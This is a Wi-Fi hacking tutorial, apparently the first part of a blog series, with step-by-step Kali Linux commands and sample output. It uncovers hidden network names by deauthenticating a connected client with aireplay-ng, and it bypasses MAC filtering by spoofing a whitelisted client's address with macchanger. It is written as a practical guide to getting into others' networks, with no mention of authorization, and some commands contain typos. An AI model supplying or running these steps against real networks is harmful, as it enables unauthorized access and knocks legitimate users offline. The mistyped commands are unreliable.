WIFI CRACKING (Part-1)
In this writeup we are going to learn how to gain access on networks and bypass their security features , we will be covering following types of networks:
- Target Hidden networks
- Bypass MAC filtering
- Methods to gain access on
- Captive portals
- WEP, WPA, WPA2
- Fake Access Points
- WPA Enterprise
these are main topics but there are many subtopics in each main topic which we will discuss in depth so just follow us.
Let’s begin with HIDDEN NETWORKS, a hidden network is one that does not broadcast its name or ESSID and problem with this types of networks are we can’t connect even they are open networks, the solution to this problem is airodump-ng and deauth auth
NOTE : Use your wireless adapter in monitor mode and use your wireless adapter name in commands whatever it is in our case we use wlan0
Run: (to see all networks around you)
root@kali:~# airodump-ng wlan0
You will get something like This
CH 1 ][ Elapsed: 0 s ][ 2020-05-05 20:35
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
56:13:58:76:5B:55 -34 100 213 64 0 1 360 WPA2 CCMP PSK OnePlus7T
44:11:C8:21:7B:76 25 100 14 0 0 6 54e WPA2 CCMP PSK NETGEAR
63:16:F0:EC:76:F3 25 14 0 0 0 11 54e OPN <length: 0>
simply to identify Hidden networks see *ESSID field and there will be no name or <length : 0> in the place so copy its MAC Address and run airodump-ng
root@kali:~# airodump-ng --bssid 63:16:F0:EC:76:F3 --chaneel 11 wlan0
CH 1 ][ Elapsed: 1 min ][ 2020-05-05 20:35
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
63:16:F0:EC:76:F3 25 14 0 0 0 11 54e OPN <length: 0>
BSSID STATION PWR Rate Lost Frames Probe
63:16:F0:EC:76:F3 33:90:E9:50:A8:F4 -33 0 -21 0 9
(Don’t quit this operation)
Sometimes just running the airodump-ng will give you the name of the network or just use deauth attack to anyone of the client which is connected to that network
root@kali:~# aireplay-ng --deauth 4 -a 63:16:F0:EC:76:F3 -c 33:90:E9:50:A8:F4 wlan0
Hit enter after some packet the name of network will be available
CH 1 ][ Elapsed: 1 min ][ 2020-05-05 20:35
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
63:16:F0:EC:76:F3 25 14 0 0 0 11 54e OPN XOXO
BSSID STATION PWR Rate Lost Frames Probe
63:16:F0:EC:76:F3 33:90:E9:50:A8:F4 -33 0 -21 0 9
Now you get the name we want to connect with this network for this :
NOTE : You cannot connect any network in monitor mode so reset your wireless adapter to managed mode because monitor mode is only used to capture the packets
there are many options to do this either use airmon-ng stop wlan0mon or iwconfig wlan0 mode managed use any of the command as your wish or just simply disconnect your wireless apadter and connect it once again it will do your job and run .
root@kali:~# service network-manager start
Now,
- Go to your wifi options select the options connect to hidden wifi network
- select security option and write the name you got.
- It will connect it successfully to a hidden network.
MAC FILTERING
NOTE: wireless card in monitor mode
Another chance you will be not able to connect an open network even if you know it key because that router must be using mac filtering, since MAC Address is unique to each network device, Routers can use mac filtering to allow/deny devices from connecting based on mac address, it works on :
- Using a blacklist- allow all MACs to connect except the ones in the list
- Using a whitelist- deny all MACs from connecting except ones in the list.
At first lets see how to bypass blacklist method
Run: (to see all networks around you)
root@kali:~# airodump-ng wlan0
CH 1 ][ Elapsed: 0 s ][ 2020-05-06 10:35
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
56:13:58:76:5B:55 -34 100 213 64 0 1 360 WPA2 CCMP PSK OnePlus7T
44:11:C8:21:7B:76 25 100 14 0 0 6 54e WPA2 CCMP PSK NETGEAR
63:16:F0:EC:76:F3 25 14 0 0 0 11 54e OPN XOXO
Run airodump-ng on that specific network to see clients connected to it
root@kali:~# airodump-ng --bssid 63:16:F0:EC:76:F3 --chaneel 11 wlan0
CH 1 ][ Elapsed: 45 sec ][ 2020-05-06 10:37
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
63:16:F0:EC:76:F3 25 14 0 0 0 11 54e OPN XOXO
BSSID STATION PWR Rate Lost Frames Probe
63:16:F0:EC:76:F3 80:E9:59:77:4F:99 -33 0 -21 0 9
Output suggest that the client with this 80:E9:59:77:4F:99 address is in whitelist thats why it connected to it change your MAC address of wireless card to same as connected client
NOTE: For connecting network change mode to managed (disconnect the card and again connect to machine) and use macchanger tool change MAC address
root@kali:~# ifconfig wlan0 down
root@kali:~# macchanger -m 80:E9:59:77:4F:99 wlan0
this command will to do the job see if you get any error or you want to change MAC Address in different way you can do it Now if you go to wifi-settings and you will be able to connect to it because now you are in the whitelist.
This is only the first part don’t miss other parts. You can get all the neccessary resources from our Github repository.
I hope you enjoyed this writeup and learnt something new if you have any queries feel free to ask in comments box or contact us through mail, or have suggestions for improvements ? We’d love to hear you, send us an email!